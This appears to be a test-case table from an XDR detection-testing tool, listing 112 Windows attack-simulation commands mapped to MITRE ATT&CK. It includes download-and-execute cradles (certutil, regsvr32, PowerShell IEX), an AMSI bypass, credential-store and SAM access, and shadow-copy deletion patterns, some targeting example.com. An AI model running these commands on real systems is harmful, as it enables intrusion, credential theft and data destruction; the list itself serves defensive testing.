Test Cases 112
All Test Cases
| ID | Category | Name | Command | Risk | MITRE | Source |
|---|---|---|---|---|---|---|
| whoami | Discovery | User Discovery (whoami) | `whoami /all` | LOW | T1033 | Plugin:All XDR Tests |
| hostname | Discovery | Hostname | `hostname` | LOW | T1082 | Plugin:All XDR Tests |
| ipconfig | Discovery | IP Configuration | `ipconfig /all` | LOW | T1016 | Plugin:All XDR Tests |
| systeminfo | Discovery | System Information | `systeminfo` | LOW | T1082 | Plugin:All XDR Tests |
| netstat | Discovery | Network Connections | `netstat -ano` | LOW | T1049 | Plugin:All XDR Tests |
| tasklist | Discovery | Process List | `tasklist` | LOW | T1057 | Plugin:All XDR Tests |
| arp | Discovery | ARP Table | `arp -a` | LOW | T1016 | Plugin:All XDR Tests |
| route | Discovery | Routing Table | `route print` | LOW | T1016 | Plugin:All XDR Tests |
| netuser | Discovery | Local Users | `net user` | MEDIUM | T1087.001 | Plugin:All XDR Tests |
| netgroup | Discovery | Local Groups | `net localgroup` | MEDIUM | T1087.001 | Plugin:All XDR Tests |
| netadmins | Discovery | Local Admins | `net localgroup administrators` | MEDIUM | T1087.001 | Plugin:All XDR Tests |
| netshare | Discovery | Network Shares | `net share` | LOW | T1135 | Plugin:All XDR Tests |
| os | Discovery | WMIC OS Info | `wmic os get caption,version,osarchitecture` | MEDIUM | T1047 | Plugin:All XDR Tests |
| proc | Discovery | WMIC Process | `wmic process list brief` | MEDIUM | T1047 | Plugin:All XDR Tests |
| service | Discovery | WMIC Services | `wmic service list brief` | MEDIUM | T1047 | Plugin:All XDR Tests |
| nltest | Discovery | Domain Trust Discovery | `nltest /domain_trusts` | MEDIUM | T1482 | Plugin:All XDR Tests |
| software | Discovery | Security Software Discovery | `wmic /namespace:\\root\securitycenter2 path antivirusproduct...` | MEDIUM | T1518.001 | Plugin:All XDR Tests |
| url | LOLBin | Certutil URL Download | `certutil -urlcache -split -f http://example.com/test.txt %TE...` | HIGH | T1105 | Plugin:All XDR Tests |
| decode | LOLBin | Certutil Decode | `certutil -decode %TEMP%\test.txt %TEMP%\decoded.txt` | HIGH | T1140 | Plugin:All XDR Tests |
| bitsadmin | LOLBin | BitsAdmin Download | `bitsadmin /transfer testjob /download /priority normal http:...` | HIGH | T1197 | Plugin:All XDR Tests |
| mshta | LOLBin | MSHTA Execution | `mshta about:blank` | HIGH | T1218.005 | Plugin:All XDR Tests |
| url | LOLBin | MSHTA URL Execution | `mshta http://example.com` | HIGH | T1218.005 | Plugin:All XDR Tests |
| regsvr32 | LOLBin | Regsvr32 Pattern (Squiblydoo) | `regsvr32 /s /n /u /i:http://example.com/test.sct scrobj.dll` | HIGH | T1218.010 | Plugin:All XDR Tests |
| rundll32 | LOLBin | Rundll32 Pattern | `rundll32 shell32.dll,Control_RunDLL` | HIGH | T1218.011 | Plugin:All XDR Tests |
| url | LOLBin | Rundll32 URL Execution | `rundll32.exe url.dll,OpenURL http://example.com` | HIGH | T1218.011 | Plugin:All XDR Tests |
| msiexec | LOLBin | MSIExec URL | `msiexec /q /i http://example.com/test.msi` | HIGH | T1218.007 | Plugin:All XDR Tests |
| wscript | LOLBin | WScript Execution | `wscript //nologo //e:vbscript test.vbs` | MEDIUM | T1059.005 | Plugin:All XDR Tests |
| cscript | LOLBin | CScript Execution | `cscript //nologo test.vbs` | MEDIUM | T1059.005 | Plugin:All XDR Tests |
| cmstp | LOLBin | CMSTP Bypass | `cmstp.exe /s %TEMP%\test.inf` | HIGH | T1218.003 | Plugin:All XDR Tests |
| encoded | PowerShell | PowerShell Encoded Command | `powershell.exe -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgA...` | HIGH | T1059.001 | Plugin:All XDR Tests |
| cradle | PowerShell | PowerShell Download Cradle (IEX) | `powershell.exe -c "IEX (New-Object Net.WebClient).DownloadSt...` | HIGH | T1059.001 | Plugin:All XDR Tests |
| webclient | PowerShell | PowerShell Hidden WebClient | `powershell.exe -nop -w hidden -c "(New-Object Net.WebClient)...` | HIGH | T1059.001 | Plugin:All XDR Tests |
| policy | PowerShell | PowerShell Bypass Execution Policy | `powershell.exe -ExecutionPolicy Bypass -Command "IWR http://...` | HIGH | T1059.001 | Plugin:All XDR Tests |
| webrequest | PowerShell | PowerShell Invoke-WebRequest | `powershell.exe -Command "Invoke-WebRequest -Uri http://examp...` | MEDIUM | T1071.001 | Plugin:All XDR Tests |
| load | PowerShell | PowerShell Reflection Load | `powershell.exe -Command "[System.Reflection.Assembly]::LoadW...` | HIGH | T1620 | Plugin:All XDR Tests |
| decode | PowerShell | PowerShell Base64 Decode to File | `powershell.exe -Command "[System.Convert]::FromBase64String(...` | HIGH | T1140 | Plugin:All XDR Tests |
| bypass | PowerShell | PowerShell AMSI Bypass Pattern | `powershell.exe -Command "[Ref].Assembly.GetType('System.Mana...` | CRITICAL | T1562.001 | Plugin:All XDR Tests |
| wget | PowerShell | PowerShell IEX with Wget | `powershell.exe -c "iex(wget http://example.com -UseBasicPars...` | HIGH | T1059.001 | Plugin:All XDR Tests |
| list | PowerShell | PowerShell Process List | `powershell.exe -Command "Get-Process \| Select-Object -First ...` | LOW | T1057 | Plugin:All XDR Tests |
| clipboard | PowerShell | PowerShell Clipboard Access | `powershell.exe -Command "Get-Clipboard"` | MEDIUM | T1115 | Plugin:All XDR Tests |
| screenshot | PowerShell | PowerShell Screenshot Test | `powershell.exe -Command "Add-Type -AssemblyName System.Windo...` | MEDIUM | T1113 | Plugin:All XDR Tests |
| access | Credential | LSASS Process Access | `powershell.exe -Command "Get-Process lsass \| Select-Object I...` | CRITICAL | T1003.001 | Plugin:All XDR Tests |
| registry | Credential | SAM Registry Access | `reg query HKLM\SAM` | HIGH | T1003.002 | Plugin:All XDR Tests |
| registry | Credential | SECURITY Registry Access | `reg query HKLM\SECURITY` | HIGH | T1003.002 | Plugin:All XDR Tests |
| cmdkey | Credential | Cmdkey List | `cmdkey /list` | HIGH | T1555 | Plugin:All XDR Tests |
| vault | Credential | Vault Query | `vaultcmd /list` | HIGH | T1555.004 | Plugin:All XDR Tests |
| dpapi | Credential | DPAPI Master Key Access | `powershell.exe -Command "Get-ChildItem C:\Users\*\AppData\Ro...` | HIGH | T1555.003 | Plugin:All XDR Tests |
| folder | Credential | Credentials Folder Enum | `powershell.exe -Command "Get-ChildItem C:\Users\*\AppData\Lo...` | HIGH | T1555.004 | Plugin:All XDR Tests |
| run | Persistence | Registry Run Key Query | `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` | MEDIUM | T1547.001 | Plugin:All XDR Tests |
| runonce | Persistence | Registry RunOnce Query | `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run...` | MEDIUM | T1547.001 | Plugin:All XDR Tests |
| query | Persistence | Scheduled Tasks Query | `schtasks /query /fo LIST` | MEDIUM | T1053.005 | Plugin:All XDR Tests |
| create | Persistence | Scheduled Task Creation | `schtasks /create /tn XDRTest /tr calc.exe /sc once /st 23:59...` | HIGH | T1053.005 | Plugin:All XDR Tests |
| create | Persistence | Service Creation Attempt | `sc create XDRTestSvc binPath= "cmd.exe /c echo test" start= ...` | HIGH | T1543.003 | Plugin:All XDR Tests |
| dir | Persistence | Startup Folder List | `dir "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup...` | LOW | T1547.001 | Plugin:All XDR Tests |
| check | Persistence | WMI Persistence Check | `powershell.exe -Command "Get-WmiObject -Namespace root\subsc...` | MEDIUM | T1546.003 | Plugin:All XDR Tests |
| strings | Defense Evasion | AMSI Bypass Strings | `powershell.exe -Command "$null = 'AmsiScanBuffer'"` | HIGH | T1562.001 | Plugin:All XDR Tests |
| strings | Defense Evasion | ETW Bypass Strings | `powershell.exe -Command "$null = 'EtwEventWrite'"` | HIGH | T1562.006 | Plugin:All XDR Tests |
| disable | Defense Evasion | Defender Disable Pattern | `powershell.exe -Command "$null = 'Set-MpPreference -DisableR...` | HIGH | T1562.001 | Plugin:All XDR Tests |
| timestomp | Defense Evasion | Timestomping Pattern | `powershell.exe -Command "$null = '(Get-Item file).LastWriteT...` | MEDIUM | T1070.006 | Plugin:All XDR Tests |
| file | Defense Evasion | Hidden File Creation | `echo test > %TEMP%\.hidden.txt && attrib +h %TEMP%\.hidden.t...` | MEDIUM | T1564.001 | Plugin:All XDR Tests |
| ads | Defense Evasion | Alternate Data Stream | `echo hidden > %TEMP%\test.txt:hidden` | MEDIUM | T1564.004 | Plugin:All XDR Tests |
| psexec | Lateral Movement | PsExec Pattern | `powershell.exe -Command "$null = 'psexec \\target -u user -p...` | HIGH | T1570 | Plugin:All XDR Tests |
| process | Lateral Movement | WMI Process Create (Remote) | `wmic process call create "cmd.exe /c echo test"` | CRITICAL | T1047 | Plugin:All XDR Tests |
| winrm | Lateral Movement | WinRM Command Pattern | `powershell.exe -Command "$null = 'Invoke-Command -ComputerNa...` | MEDIUM | T1021.006 | Plugin:All XDR Tests |
| view | Lateral Movement | Net View | `net view` | MEDIUM | T1018 | Plugin:All XDR Tests |
| session | Lateral Movement | Net Session | `net session` | MEDIUM | T1049 | Plugin:All XDR Tests |
| use | Lateral Movement | Net Use | `net use` | MEDIUM | T1021.002 | Plugin:All XDR Tests |
| service | Lateral Movement | Remote Service Pattern | `powershell.exe -Command "$null = 'sc \\target create malware...` | HIGH | T1021.002 | Plugin:All XDR Tests |
| list | Ransomware | Shadow Copy List | `vssadmin list shadows` | HIGH | T1490 | Plugin:All XDR Tests |
| pattern | Ransomware | Shadow Copy Delete Pattern | `powershell.exe -Command "$null = 'vssadmin delete shadows /a...` | CRITICAL | T1490 | Plugin:All XDR Tests |
| bcdedit | Ransomware | BCDedit Pattern | `powershell.exe -Command "$null = 'bcdedit /set recoveryenabl...` | HIGH | T1490 | Plugin:All XDR Tests |
| query | Ransomware | BCDedit Query | `bcdedit /enum` | MEDIUM | T1490 | Plugin:All XDR Tests |
| patterns | Injection | Process Injection APIs | `powershell.exe -Command "$null = 'VirtualAllocEx WriteProces...` | HIGH | T1055 | Plugin:All XDR Tests |
| patterns | Injection | DLL Injection Patterns | `powershell.exe -Command "$null = 'LoadLibraryA SetWindowsHoo...` | HIGH | T1055.001 | Plugin:All XDR Tests |
| exfil | Command & Control | DNS Exfiltration Test | `nslookup xdrtest.exfil-test.local` | MEDIUM | T1048.003 | Plugin:All XDR Tests |
| beacon | Command & Control | Beaconing Pattern | `nslookup c2-beacon-test.local` | MEDIUM | T1071.004 | Plugin:All XDR Tests |
| dns | Command & Control | Suspicious DNS Query | `nslookup evil.testdomain.invalid` | MEDIUM | T1071 | Plugin:All XDR Tests |
| sam | File Operations | Sensitive File Access (SAM) | `powershell.exe -Command "Test-Path 'C:\Windows\System32\conf...` | HIGH | T1005 | Plugin:All XDR Tests |
| system | File Operations | Sensitive File Access (SYSTEM) | `powershell.exe -Command "Test-Path 'C:\Windows\System32\conf...` | HIGH | T1005 | Plugin:All XDR Tests |
| sys | File Operations | Copy System File | `copy C:\Windows\System32\notepad.exe %TEMP%\notepad_copy.exe` | MEDIUM | T1105 | Plugin:All XDR Tests |
| query | File Operations | File Attributes Query | `attrib %TEMP%` | LOW | T1564.001 | Plugin:All XDR Tests |
| sweep | Network | Ping Sweep | `for /L %i in (1,1,5) do @ping -n 1 -w 100 192.168.1.%i` | MEDIUM | T1018 | Plugin:All XDR Tests |
| firewall | Network | Firewall Status | `netsh advfirewall show allprofiles state` | MEDIUM | T1016 | Plugin:All XDR Tests |
| wlan | Network | WLAN Profiles | `netsh wlan show profiles` | MEDIUM | T1016 | Plugin:All XDR Tests |
| download | Execution | Curl Download | `curl -o %TEMP%\test.txt http://example.com/robots.txt` | MEDIUM | T1105 | Plugin:All XDR Tests |
| process | Execution | WMIC Process Call Create | `wmic process call create "cmd.exe /c echo XDR_TEST > %TEMP%\...` | CRITICAL | T1047 | Plugin:All XDR Tests |
| sim | Execution | Office Macro Simulation | `wmic process call create "powershell.exe -c IWR http://examp...` | CRITICAL | T1059.005 | Plugin:All XDR Tests |
| drivers | Enumeration | Loaded Drivers | `driverquery` | LOW | T1082 | Plugin:All XDR Tests |
| env | Enumeration | Environment Variables | `set` | LOW | T1082 | Plugin:All XDR Tests |
| eventlog | Enumeration | Event Log Query | `wevtutil qe Security /c:1 /f:text` | MEDIUM | T1070.001 | Plugin:All XDR Tests |
| certutil | LOLBin | Certutil Download | `certutil -urlcache -split -f http://example.com/test.txt %TE...` | HIGH | T1140 | Plugin:XDR Security Tests |
| bitsadmin | LOLBin | BitsAdmin Download | `bitsadmin /transfer job /download /priority normal http://ex...` | HIGH | T1197 | Plugin:XDR Security Tests |
| mshta | LOLBin | MSHTA Execution | `mshta about:blank` | HIGH | T1218.005 | Plugin:XDR Security Tests |
| regsvr32 | LOLBin | Regsvr32 Test | `regsvr32 /s /n /u /i:test.txt scrobj.dll` | HIGH | T1218.010 | Plugin:XDR Security Tests |
| run | Persistence | Registry Run Key | `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` | HIGH | T1547.001 | Plugin:XDR Security Tests |
| schtasks | Persistence | Scheduled Tasks Query | `schtasks /query /fo LIST` | MEDIUM | T1053.005 | Plugin:XDR Security Tests |
| whoami | Discovery | User Discovery | `whoami /all` | LOW | T1033 | Plugin:XDR Security Tests |
| systeminfo | Discovery | System Information | `systeminfo` | LOW | T1082 | Plugin:XDR Security Tests |
| netstat | Discovery | Network Connections | `netstat -ano` | LOW | T1049 | Plugin:XDR Security Tests |
| tasklist | Discovery | Process List | `tasklist` | LOW | T1057 | Plugin:XDR Security Tests |
| ipconfig | Discovery | Network Configuration | `ipconfig /all` | LOW | T1016 | Plugin:XDR Security Tests |
| arp | Discovery | ARP Table | `arp -a` | LOW | T1016 | Plugin:XDR Security Tests |
| process | Execution | WMIC Process List | `wmic process list brief` | MEDIUM | T1047 | Plugin:XDR Security Tests |
| os | Execution | WMIC OS Info | `wmic os get caption,version` | MEDIUM | T1047 | Plugin:XDR Security Tests |
| cmd | File | File Copy Pattern | `copy C:\Windows\System32\notepad.exe %TEMP%\test.exe` | MEDIUM | T1105 | Plugin:XDR Security Tests |
| attrib | File | File Attributes | `attrib %TEMP%` | LOW | T1564.001 | Plugin:XDR Security Tests |
| enum | Network | Net User Enum | `net user` | MEDIUM | T1087.002 | Plugin:XDR Security Tests |
| localgroup | Network | Local Group Enum | `net localgroup administrators` | MEDIUM | T1087.001 | Plugin:XDR Security Tests |
| share | Network | Network Shares | `net share` | LOW | T1135 | Plugin:XDR Security Tests |
| session | Network | Network Sessions | `net session` | LOW | T1049 | Plugin:XDR Security Tests |
| 001 | Custom | Example Custom Test | `whoami` | LOW | - | Plugin:Custom Tests Template |
| 002 | Custom | Example Network Test | `ipconfig /all` | MEDIUM | - | Plugin:Custom Tests Template |
Showing 112 test cases